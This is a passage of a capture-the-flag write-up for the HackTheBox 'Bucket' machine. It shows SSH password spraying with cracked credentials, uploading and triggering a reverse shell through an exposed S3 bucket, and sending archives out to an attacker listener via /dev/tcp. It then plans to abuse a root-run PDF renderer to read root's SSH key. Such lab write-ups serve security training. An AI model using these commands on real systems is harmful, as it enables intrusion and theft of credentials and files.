class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec ssh 10.10.10.212 -u ./users.txt -p ./passwords.txt</code></span></span></p></div><pre id="https://www.notion.so/9f9947042a3f4cc09aaf30f6926fc95d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SSH 10.10.10.212 22 10.10.10.212 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4
SSH 10.10.10.212 22 10.10.10.212 [-] Mgmt:Management@#1@# Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Mgmt:Welcome123! Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Mgmt:n2vM-<_K_Q:.Aa2 Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Cloudadm:Management@#1@# Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Cloudadm:Welcome123! Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Cloudadm:n2vM-<_K_Q:.Aa2 Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Sysadm:Management@#1@# Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Sysadm:Welcome123! Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Sysadm:n2vM-<_K_Q:.Aa2 Authentication failed.</span></span></span></code></pre></li><li id="https://www.notion.so/9a7e6cbbcb5743de995465ea0d9b43bf" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">None are working (including lowercase variant). The passwords seem legitimate, but the usernames may only be substitute names and are not real user accounts.</span></span></li></ul><div id="https://www.notion.so/41d8bb37534a4cf698012ac741cbc502" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">S3 Directory Traversal</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/44dfa5dac6c640858adb2b203355a94d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">To make interaction with the DynamoDB easier, we can install the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">aws-cli</code></span><span class="SemanticString"> utility:</span></span><div id="https://www.notion.so/89a3dcbee02a4ed88a5bae4c6f65f149" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo pacman -S aws-cli</code></span></span></p></div></li><li id="https://www.notion.so/4e7b5191610f48dd8ea1b0ead4394c60" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Setup </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">aws-cli</code></span><span class="SemanticString"> and configure access settings, entries can be set to anything as the S3 buckets are publically exposed:</span></span><div id="https://www.notion.so/f1c1441a61cf45cf8d1a8626b8ed29aa" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws configure</code></span></span></p></div><div id="https://www.notion.so/ef2fd56ae068452b8a1a298e2e478d22" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">AWS Access Key ID [None]: samiko
AWS Secret Access Key [None]: okimas
Default region name [None]: us-ease-1
Default output format [None]: text</code></span></span></p></div></li><li id="https://www.notion.so/2e924d776db945dbb05414fed22c4610" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Enumerating files on the S3 server:</span></span><div id="https://www.notion.so/b34bc1e4379141388415a65eb8ca527f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws s3 --endpoint-url http://s3.bucket.htb/ ls</code></span></span></p></div><pre id="https://www.notion.so/e7b6911340cf4c4d91dd8f3fd02b9fc4" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>2021-02-01 22:39:04 adserver</span></span></span></code></pre><div id="https://www.notion.so/5049a26e93a34ee8bb090ee532acd685" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws s3 --endpoint-url http://s3.bucket.htb/ ls s3://adserver/</code></span></span></p></div><pre id="https://www.notion.so/fd92a132df0a40ce90d46215d307079d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span> PRE images/
2021-02-01 22:39:05 5344 index.html</span></span></span></code></pre><div id="https://www.notion.so/ded7f19c11874b2f932f55fc54bca87f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws s3 --endpoint-url http://s3.bucket.htb/ ls s3://adserver/images/</code></span></span></p></div><pre id="https://www.notion.so/0d127ab6061f4b56b32979972c3b185b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>2021-02-01 22:41:05 37840 bug.jpg
2021-02-01 22:41:05 51485 cloud.png
2021-02-01 22:41:05 16486 malware.png</span></span></span></code></pre></li><li id="https://www.notion.so/8251001862514372bf9168b7d5527b2d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">These are the images we found earlier on the main host </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://bucket.htb/">http://bucket.htb</a></span><span class="SemanticString">, looks like the server hosting the S3 virtual host is also hosting the main webserver.</span></span></li><li id="https://www.notion.so/f2fb1a01f4df40bcbe322e0774c3e4ed" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Let's try to upload a reverse shell with the cp command:</span></span><div id="https://www.notion.so/81195030bdff45e188581c73c6c99d13" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws s3 --endpoint-url http://s3.bucket.htb/ cp ./reverse.jsp s3://adserver</code></span></span></p></div></li><li id="https://www.notion.so/20491771dfb749e3a7e8a5e8e9da7c22" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Now, if we tried to navigate to the reverse shell on S3 subdomain normally, it won't be executed and the browser will instead try to download the PHP file. This is because the S3 bucket is only configured to host static content.</span></span></li><li id="https://www.notion.so/be20721cdaac468087cf6fe82bf47851" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">However, since the adserver bucket is also hosting and communicating with the primary domain, we can leverage the Apache webserver on </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://bucket.htb/">http://bucket.htb</a></span><span class="SemanticString"> to execute our reverse shell by navigating to </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://bucket.htb/reverse.php">http://bucket.htb/reverse.php</a></span><span class="SemanticString">.</span></span></li><li id="https://www.notion.so/49de3edcb85141a1bc059ec821ef386e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The S3 webserver seems to be constantly cleaning up files, so there is only a small window between the moment the file is synchronised and before it gets deleted. We can maximise our chances by repeatedly making requests to the file with a script.</span></span></li><li id="https://www.notion.so/9f800a78e3624570bf5559193cb48286" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Creating upload.sh:</span></span><pre id="https://www.notion.so/816d6d3a1c8149eaa4fef6afc4d7c8e3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>#!/bin/sh
aws --endpoint-url http://s3.bucket.htb/ s3 cp ./reverse.php s3://adserver/
echo "Upload successful, start a nc listener on port 6969 now:"
while [ true ]
do
curl http://bucket.htb/reverse.php &> /dev/null
echo -n "."
done</span></span></span></code></pre></li><li id="https://www.notion.so/348a71752ae748568cdda80a21d387d2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">After about 30-60 seconds, we should get a shell as www-data:</span></span><div id="https://www.notion.so/d110ebceb6ed475284a2b3ddc3bf3b22" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id && hostname</code></span></span></p></div><pre id="https://www.notion.so/ae7b3db793fe445e828655b66de68fe7" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bucket</span></span></span></code></pre></li><li id="https://www.notion.so/65e0310bea65428bab26fd7810848d20" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Navigating to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/home</code></span><span class="SemanticString"> directory, we see a user by the name "roy".</span></span></li><li id="https://www.notion.so/6d57cc4b79e84f0093b9c5fdd74039b4" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checking passwords against roy on SSH:</span></span><div id="https://www.notion.so/4cdd286ec2e44517b589baaaa0922f7d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec ssh 10.10.10.212 -u 'roy' -p passwords.txt</code></span></span></p></div><pre id="https://www.notion.so/a748fa01ef93443b8ecae4b731b97c68" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SSH 10.10.10.212 22 10.10.10.212 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4
SSH 10.10.10.212 22 10.10.10.212 [-] roy:Management@#1@# Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] roy:Welcome123! Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [+] roy:n2vM-<_K_Q:.Aa2</span></span></span></code></pre></li><li id="https://www.notion.so/9c14ce5d4bc24a37b3088fafd8dca49a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Looks like Roy is the sysadmin for the Bucket company, let's SSH in:</span></span><div id="https://www.notion.so/45be045b967541a58046bde552564d7d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh roy@10.10.10.212</code></span></span></p></div><div id="https://www.notion.so/e85b1ba922334688ae7741b1e46615be" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">n2vM-<_K_Q:.Aa2</code></span></span></p></div><div id="https://www.notion.so/33949042f42249acbc9310aa18039a44" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id</code></span></span></p></div><pre id="https://www.notion.so/83f8bf59324c41f9be7eee147a4c2d22" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>roy
uid=1000(roy) gid=1000(roy) groups=1000(roy),1001(sysadm)</span></span></span></code></pre></li><li id="https://www.notion.so/9f661fd7797b42f2b54e61427b081075" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get user flag!</span></span></li></ul><h2 id="https://www.notion.so/ac48149ed1e14ac1a410f1c892cecd43" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/ac48149ed1e14ac1a410f1c892cecd43"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/f890206560d44df8845abe667849f808" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Roy is in the group </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">1001(sysadm)</code></span><span class="SemanticString">, meaning he can see system logs which can contain useful information or credentials.</span></span></li><li id="https://www.notion.so/b24fb5fc1dce4cb0a06d1a34506bf1e5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checking sudo permissions:</span></span><div id="https://www.notion.so/c0223d7653da4eabbf330c69c92ecf58" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo -l</code></span></span></p></div><pre id="https://www.notion.so/bf25bc87b1104650b839a156b7f1442f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Sorry, user roy may not run sudo on bucket.</span></span></span></code></pre></li></ul><div id="https://www.notion.so/53ae5b26aeb74d5481c49946d240e560" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">AWS Project</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/42c7ab932ea442aca52f036cc8aea976" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/project</code></span><span class="SemanticString"> folder in roy's home directory:</span></span><div id="https://www.notion.so/c9f048ad5ca74631b751a187188f63e9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la ~/project/</code></span></span></p></div><pre id="https://www.notion.so/218eb2ce5e6e4fe6ad77db2cf7eaa1ad" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>-rw-rw-r-- 1 roy roy 63 Sep 24 03:16 composer.json
-rw-rw-r-- 1 roy roy 20533 Sep 24 03:16 composer.lock
-rw-r--r-- 1 roy roy 367 Sep 24 03:15 db.php
drwxrwxr-x 10 roy roy 4096 Sep 24 03:16 vendor</span></span></span></code></pre></li><li id="https://www.notion.so/220cd37315dc4d858fa5b407af0dfd02" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Copy files back to local for easier access, zip up the directory:</span></span><div id="https://www.notion.so/95895bca19e44c38af8e5ceb5dd3bf22" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ tar -czvf project.tar.gz ./project/</code></span></span></p></div></li><li id="https://www.notion.so/25f4de8eeac242cab03834eda6d847ec" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Now on our local machine, start a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">nc</code></span><span class="SemanticString"> listener to receive the archive:</span></span><div id="https://www.notion.so/02940579b8e948869fd16218478fab49" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 6969 > project.tar.gz</code></span></span></p></div></li><li id="https://www.notion.so/36457f77f513453ba32124ca842a3fae" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">On the remote machine, send the archive back to ourselves and extract it:</span></span><div id="https://www.notion.so/402c9d609e054185b384f47b8701a273" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat project.tar.gz > /dev/tcp/10.10.14.103/6969</code></span></span></p></div><div id="https://www.notion.so/63528ff7432f4d97b3cfc3fc8484255e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ tar -xzvf ./project.tar.gz</code></span></span></p></div></li></ul><div id="https://www.notion.so/86c8f886f6074bf293bdb7e4757cd7a2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Port 8000</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/ae77a675f6da4646af53802324b7ac1d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checking for any listening ports:</span></span><div id="https://www.notion.so/746523fab6434152874de10d8d793aa6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ netstat -tulnp</code></span></span></p></div><pre id="https://www.notion.so/76262e51f74c403f9547900dee4bc35d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:37025 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:4566 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -</span></span></span></code></pre></li><li id="https://www.notion.so/596fc9514c8b4ce9a335cdfa415f7e63" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Getting port 8000 response:
</span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 6969 > 8000.html</code></span></span><div id="https://www.notion.so/eaaed9fccc5043bbb8b9371b41f6be6a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ curl localhost:8000 > /dev/tcp/10.10.14.103/6969</code></span></span></p></div></li><li id="https://www.notion.so/f5151328877e4886a8ebe291a7ab0e1b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We can also find a seperate </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bucket-app</code></span><span class="SemanticString"> directory under </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/var/www/</code></span><span class="SemanticString">, with files a lot similar to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">~/project/</code></span><span class="SemanticString"> directory:</span></span><div id="https://www.notion.so/87529dec9dbc41a697a771a9c94ac47e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la /var/www/bucket-app/</code></span></span></p></div><pre id="https://www.notion.so/d181b455f72e4f23b5fdc431006fafb0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>total 856
drwxr-x---+ 4 root root 4096 Sep 23 10:56 .
drwxr-xr-x 4 root root 4096 Sep 21 12:28 ..
-rw-r-x---+ 1 root root 63 Sep 23 02:23 composer.json
-rw-r-x---+ 1 root root 20533 Sep 23 02:23 composer.lock
drwxr-x---+ 2 root root 4096 Sep 23 03:29 files
-rwxr-x---+ 1 root root 17222 Sep 23 03:32 index.php
-rwxr-x---+ 1 root root 808729 Jun 10 2020 pd4ml_demo.jar
drwxr-x---+ 10 root root 4096 Sep 23 02:23 vendor</span></span></span></code></pre></li><li id="https://www.notion.so/49c855df057f49158ae25ec77fd02f5e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Zip it up as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">bucket-app.tar.gz</code></span><span class="SemanticString">, and send it back to our local machine with the same steps above.</span></span></li><li id="https://www.notion.so/9a2387c473484f5fb2e0ffa6c8ae2f6e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Looking at </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">index.php</code></span><span class="SemanticString">, there is some interesting PHP code at the top of the file:</span></span><pre id="https://www.notion.so/af6371accf1d44e8aea6aad7cc336fad" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token php language-php"><span class="token delimiter important"><?php</span>
<span class="token keyword">require</span> <span class="token string single-quoted-string">'vendor/autoload.php'</span><span class="token punctuation">;</span>
<span class="token keyword">use</span> <span class="token package">Aws<span class="token punctuation">\</span>DynamoDb<span class="token punctuation">\</span>DynamoDbClient</span><span class="token punctuation">;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"REQUEST_METHOD"</span><span class="token punctuation">]</span><span class="token operator">===</span><span class="token string double-quoted-string">"POST"</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"action"</span><span class="token punctuation">]</span><span class="token operator">===</span><span class="token string double-quoted-string">"get_alerts"</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token function">date_default_timezone_set</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'America/New_York'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$client</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">DynamoDbClient</span><span class="token punctuation">(</span><span class="token punctuation">[</span>
<span class="token string single-quoted-string">'profile'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'default'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'region'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'us-east-1'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'version'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'latest'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'endpoint'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'http://localhost:4566'</span>
<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$iterator</span> <span class="token operator">=</span> <span class="token variable">$client</span><span class="token operator">-></span><span class="token function">getIterator</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'Scan'</span><span class="token punctuation">,</span> <span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'alerts'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'FilterExpression'</span> <span class="token operator">=></span> <span class="token string double-quoted-string">"title = :title"</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'ExpressionAttributeValues'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string double-quoted-string">":title"</span><span class="token operator">=></span><span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"S"</span><span class="token operator">=></span><span class="token string double-quoted-string">"Ransomware"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">foreach</span> <span class="token punctuation">(</span><span class="token variable">$iterator</span> <span class="token keyword">as</span> <span class="token variable">$item</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token variable">$name</span><span class="token operator">=</span><span class="token function">rand</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">10000</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string single-quoted-string">'.html'</span><span class="token punctuation">;</span>
<span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'files/'</span><span class="token operator">.</span><span class="token variable">$name</span><span class="token punctuation">,</span><span class="token variable">$item</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"data"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token function">passthru</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/<span class="token interpolation"><span class="token variable">$name</span></span> 800 A4 -out files/result.pdf"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token keyword">else</span>
<span class="token punctuation">{</span>
<span class="token delimiter important">?></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/c5af85f2a5794ef9b8a65e37ebe832ea" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The function does the following when a POST request with the action </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">get_alerts</code></span><span class="SemanticString"> is received:</span></span><ol class="NumberedListWrapper"><li id="https://www.notion.so/c7ae6f36cda445dd8918ade916b2405e" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString">Creates a new instance of DynamoDB on port 4566</span></span></li><li id="https://www.notion.so/94724b5ab646437ba4ad6f0ae735bba5" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString">Scans the table called </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">alerts</code></span><span class="SemanticString"> for a title with the word </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Ransomware</code></span></span></li><li id="https://www.notion.so/5fa3dde5f40f4a9cb4fc32743640808c" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString">Prints the data of that item into an HTML file with a randomised filename</span></span></li><li id="https://www.notion.so/2d16d03429674475b39dfd310f4fc859" class="NumberedList" value="4"><span class="SemanticStringArray"><span class="SemanticString">Renders the HTML file and converts the output into a PDF file with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Pd4Cmd</code></span></span></li><li id="https://www.notion.so/25982af56f9c429b9e2907946c3d1dc4" class="NumberedList" value="5"><span class="SemanticStringArray"><span class="SemanticString">Saves the file in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/var/www/bucket-app/files/</code></span></span></li></ol></li><li id="https://www.notion.so/b644068bbe084cd8a64bcc10765d6a78" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">If we searched for the DynamoDB instance on the process listings, we see that the process is owned by root, meaning all of the code above is being executed with root privileges:</span></span><div id="https://www.notion.so/461813d80b8e443fa2fe209f3d35dc8e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ps aux | grep Dynamo</code></span></span></p></div><pre id="https://www.notion.so/e7298e5038404916a9a3c3f91f366034" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root 1504 0.2 7.3 1677460 296264 ? Ssl 05:23 1:47 java -Djava.library.path=./DynamoDBLocal_lib -Xmx256m -jar DynamoDBLocal.jar -sharedDb -port 48727 -inMemory</span></span></span></code></pre></li><li id="https://www.notion.so/c1f144bb9e3f433f9c1e563a5935f347" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">aws-cli</code></span><span class="SemanticString"> utility to check the localhost instance, we see that there is no table called </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">alerts</code></span><span class="SemanticString"> to begin with:</span></span><div id="https://www.notion.so/3bd0cf2fe2044f0aab0a19773a1120c9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws dynamodb list-tables --endpoint-url http://localhost:4566</code></span></span></p></div><pre id="https://www.notion.so/2406f274345b498195284f8c5d49f2b9" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>TABLENAMES users</span></span></span></code></pre></li><li id="https://www.notion.so/c9956b1903e848748bf9361c1a25bd20" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This means the PHP code is searching for something that doesn't exist, so perhaps we can hijack it and force </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Pd4Cmd</code></span><span class="SemanticString"> to read sensitive data, such as the root's SSH key.</span></span></li><li id="https://www.notion.so/c2bce2c2fafe41979da7a455865ca936" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Following the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">aws-cli</code></span><span class="SemanticString"> documentation for DynamoDB, we can create the </span><span class="SemanticString"><code class="SemanticString__Fragment 